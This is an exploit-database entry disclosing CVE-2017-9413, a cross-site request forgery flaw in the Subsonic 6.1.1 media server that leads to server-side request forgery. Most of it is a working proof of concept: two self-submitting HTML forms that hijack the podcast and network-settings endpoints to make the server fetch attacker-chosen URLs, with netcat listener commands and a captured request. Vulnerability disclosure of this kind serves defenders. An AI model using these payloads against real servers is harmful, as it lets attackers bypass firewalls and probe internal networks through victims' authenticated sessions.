1337DAY-ID-27891
Jun 05, 2017 - 12:00 a.m.

Subsonic 6.1.1 - Server-Side Request Forgery Vulnerability

2017-06-05 00:00:00
hyp3rlinx
0day.today

EPSS: 0.003 (percentile 71.6%)

Exploit for Windows platform in category web applications

[+] Credits: John Page a.k.a hyp3rlinx  
 
Vendor:
================
www.subsonic.org
 
Product:
===============
Subsonic v6.1.1
 
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
 
  
Vulnerability Type:
==================================
CSRF leading to Server Side Request Forgery (SSRF)
 
  
CVE Reference:
==============
CVE-2017-9413
 
 
 
Security Issue:
================
Remote attackers can abuse the Podcast feature of Subsonic to launch Server Side Request Forgery attacks against the internal network
or the internet if an authenticated user clicks a malicious link or visits an attacker-controlled webpage. SSRF can be used to
bypass firewall restrictions on the LAN.
 
e.g.
 
nc.exe -llvp 1337
listening on [any] 1337 ...
 
connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
GET / HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_45
Host: 127.0.0.1:1337
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
 
 
Exploit/POC:
=============
nc.exe -llvp 1337
listening on [any] 1337 ...
 
 
1) Subscribe to Podcast CSRF Persistent SSRF
 
<form method="post" action="http://localhost:4040/podcastReceiverAdmin.view?">
<input type="text" name="add" value="http://127.0.0.1:1337">
<input type="submit" value="OK">
<script>document.forms[0].submit()</script>
</form>
 
 
nc.exe -llvp 5555
listening on [any] 5555 ...
 
 
2) Internet Radio Settings CSRF Persistent SSRF
 
<form  action="http://localhost:4040/networkSettings.view" method="post">
<input name="portForwardingEnabled" type="hidden" value="true"/>
<input type="hidden" name="_portForwardingEnabled" value="on"/>
<input  name="urlRedirectionEnabled" type="hidden" value="true" />
<input type="hidden" name="_urlRedirectionEnabled" value="on"/>
<input  name="urlRedirectType" type="radio" value="NORMAL"/>
<input  name="urlRedirectFrom" type="radio" value="yourname"/>
<input  name="urlRedirectType"  type="radio" value="CUSTOM" checked="true" />
<input  name="urlRedirectCustomUrl" type="hidden" value="http://127.0.0.1:5555"/>
<script>document.forms[0].submit()</script>
</form>

#  0day.today [2018-02-18]  #
